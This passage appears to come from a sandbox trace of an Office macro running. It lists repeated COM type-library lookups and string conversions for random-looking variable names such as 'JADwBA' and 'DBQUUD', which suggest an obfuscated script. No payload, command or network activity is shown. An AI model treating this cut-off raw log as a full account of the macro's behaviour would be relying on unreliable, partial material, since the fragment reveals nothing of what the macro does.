_DstSizeInBytes=0x8, _Src=0x3a62846 | out: _Dst=0x144ec0) returned 0x0 [0069.158] ITypeComp:RemoteBind (in: This=0x665ba60, szName="JADwBA", lHashVal=0x10e423, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6281e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="JADwBA") returned 7 [0069.158] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="JADwBA", lHashVal=0x10e423, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6281e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="JADwBA") returned 7 [0069.159] ITypeComp:RemoteBind (in: This=0x665bd30, szName="JADwBA", lHashVal=0x10e423, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.159] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JADwBA") returned 0x10e423 [0069.159] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="JADwBA" | out: _Dst="JADwBA") returned 0x0 [0069.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="JADwBA") returned 7 [0069.159] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.159] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="JADwBA", lHashVal=0x10e423, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.159] IUnknown:Release (This=0x665ba50) returned 0xd [0069.159] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.159] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="JADwBA", lHashVal=0x10e423, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.159] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.159] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.159] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="JADwBA", lHashVal=0x10e423, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.159] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.159] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.159] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="JADwBA", lHashVal=0x10e423, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.159] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6281e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="JADwBA") returned 7 [0069.159] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="JADwBA", lHashVal=0x10e423, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.159] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.159] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a6281e | out: _Dst=0x67c2d40) returned 0x0 [0069.159] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_JADwBA") returned 0x105e8d [0069.159] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_JADwBA" | out: _Dst="_B_var_JADwBA") returned 0x0 [0069.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_JADwBA") returned 14 [0069.159] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.159] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_JADwBA", lHashVal=0x105e8d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.160] IUnknown:Release (This=0x665ba50) returned 0xd [0069.160] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.160] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_JADwBA", lHashVal=0x105e8d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.160] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.160] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.160] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_JADwBA", lHashVal=0x105e8d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.160] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.160] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.160] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_JADwBA", lHashVal=0x105e8d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.160] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.160] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.160] IUnknown:Release (This=0x665ba50) returned 0xd [0069.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1160e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_JADwBA") returned 14 [0069.160] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_JADwBA", lHashVal=0x105e8d, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4a005f00720061, ppTypeComp=0x42007700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4a005f00720061, ppTypeComp=0x42007700000000, pDummy=0x0) returned 0x0 [0069.160] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a6281e | out: _Dst=0x144ec0) returned 0x0 [0069.160] ITypeComp:RemoteBind (in: This=0x665ba60, szName="AAZBBQ", lHashVal=0x10a9e7, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62896, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="AAZBBQ") returned 7 [0069.160] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="AAZBBQ", lHashVal=0x10a9e7, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62896, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="AAZBBQ") returned 7 [0069.160] ITypeComp:RemoteBind (in: This=0x665bd30, szName="AAZBBQ", lHashVal=0x10a9e7, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.160] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AAZBBQ") returned 0x10a9e7 [0069.160] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="AAZBBQ" | out: _Dst="AAZBBQ") returned 0x0 [0069.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="AAZBBQ") returned 7 [0069.161] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.161] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="AAZBBQ", lHashVal=0x10a9e7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.161] IUnknown:Release (This=0x665ba50) returned 0xd [0069.161] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.161] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="AAZBBQ", lHashVal=0x10a9e7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.161] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.161] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.161] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="AAZBBQ", lHashVal=0x10a9e7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.161] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.161] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.161] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="AAZBBQ", lHashVal=0x10a9e7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.161] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62896, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="AAZBBQ") returned 7 [0069.161] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="AAZBBQ", lHashVal=0x10a9e7, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.161] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.161] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a62896 | out: _Dst=0x67c2d40) returned 0x0 [0069.161] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_AAZBBQ") returned 0x102451 [0069.161] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_AAZBBQ" | out: _Dst="_B_var_AAZBBQ") returned 0x0 [0069.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_AAZBBQ") returned 14 [0069.161] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.161] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_AAZBBQ", lHashVal=0x102451, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.161] IUnknown:Release (This=0x665ba50) returned 0xd [0069.161] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.161] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_AAZBBQ", lHashVal=0x102451, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.161] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.161] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.161] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_AAZBBQ", lHashVal=0x102451, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.162] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.162] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.162] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_AAZBBQ", lHashVal=0x102451, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.162] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.162] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.162] IUnknown:Release (This=0x665ba50) returned 0xd [0069.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1163e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_AAZBBQ") returned 14 [0069.162] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_AAZBBQ", lHashVal=0x102451, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x41005f00720061, ppTypeComp=0x42004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x41005f00720061, ppTypeComp=0x42004200000000, pDummy=0x0) returned 0x0 [0069.162] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a62896 | out: _Dst=0x144ec0) returned 0x0 [0069.162] ITypeComp:RemoteBind (in: This=0x665ba60, szName="DBQUUD", lHashVal=0x10f518, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a628be, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="DBQUUD") returned 7 [0069.162] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="DBQUUD", lHashVal=0x10f518, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a628be, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="DBQUUD") returned 7 [0069.162] ITypeComp:RemoteBind (in: This=0x665bd30, szName="DBQUUD", lHashVal=0x10f518, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DBQUUD") returned 0x10f518 [0069.162] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="DBQUUD" | out: _Dst="DBQUUD") returned 0x0 [0069.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="DBQUUD") returned 7 [0069.162] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.162] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="DBQUUD", lHashVal=0x10f518, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.162] IUnknown:Release (This=0x665ba50) returned 0xd [0069.162] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.163] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="DBQUUD", lHashVal=0x10f518, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.163] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.163] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.163] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="DBQUUD", lHashVal=0x10f518, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.163] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.163] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.163] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="DBQUUD", lHashVal=0x10f518, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.163] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a628be, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="DBQUUD") returned 7 [0069.163] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="DBQUUD", lHashVal=0x10f518, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.163] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.163] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a628be | out: _Dst=0x67c2d40) returned 0x0 [0069.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_DBQUUD") returned 0x106f82 [0069.163] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_DBQUUD" | out: _Dst="_B_var_DBQUUD") returned 0x0 [0069.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_DBQUUD") returned 14 [0069.163] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.163] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_DBQUUD", lHashVal=0x106f82, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.163] IUnknown:Release (This=0x665ba50) returned 0xd [0069.163] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.163] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_DBQUUD", lHashVal=0x106f82, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.163] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.163] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.163] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_DBQUUD", lHashVal=0x106f82, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.163] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.163] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.163] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_DBQUUD", lHashVal=0x106f82, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.163] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.163] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.163] IUnknown:Release (This=0x665ba50) returned 0xd [0069.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1166e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_DBQUUD") returned 14 [0069.164] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_DBQUUD", lHashVal=0x106f82, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x44005f00720061, ppTypeComp=0x55005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x44005f00720061, ppTypeComp=0x55005500000000, pDummy=0x0) returned 0x0 [0069.164] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a628be | out: _Dst=0x144ec0) returned 0x0 [0069.164] ITypeComp:RemoteBind (in: This=0x665ba60, szName="ncAo_UG", lHashVal=0x1058d0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a628e6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="ncAo_UG") returned 8 [0069.164] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="ncAo_UG", lHashVal=0x1058d0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a628e6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="ncAo_UG") returned 8 [0069.164] ITypeComp:RemoteBind (in: This=0x665bd30, szName="ncAo_UG", lHashVal=0x1058d0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ncAo_UG") returned 0x1058d0 [0069.164] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="ncAo_UG" | out: _Dst="ncAo_UG") returned 0x0 [0069.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="ncAo_UG") returned 8 [0069.164] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.164] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="ncAo_UG", lHashVal=0x1058d0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.164] IUnknown:Release (This=0x665ba50) returned 0xd [0069.164] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.164] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="ncAo_UG", lHashVal=0x1058d0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.164] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.164] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.164] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="ncAo_UG", lHashVal=0x1058d0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.164] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.164] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.165] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="ncAo_UG", lHashVal=0x1058d0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.165] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a628e6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="ncAo_UG") returned 8 [0069.165] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="ncAo_UG", lHashVal=0x1058d0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.165] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.165] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a628e6 | out: _Dst=0x67c2d40) returned 0x0 [0069.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ncAo_UG") returned 0x105c54 [0069.165] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_ncAo_UG" | out: _Dst="_B_var_ncAo_UG") returned 0x0 [0069.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_ncAo_UG") returned 15 [0069.165] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.165] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_ncAo_UG", lHashVal=0x105c54, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.165] IUnknown:Release (This=0x665ba50) returned 0xd [0069.165] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.165] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_ncAo_UG", lHashVal=0x105c54, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.165] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.165] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.165] ITypeLib:RemoteIsName (in: 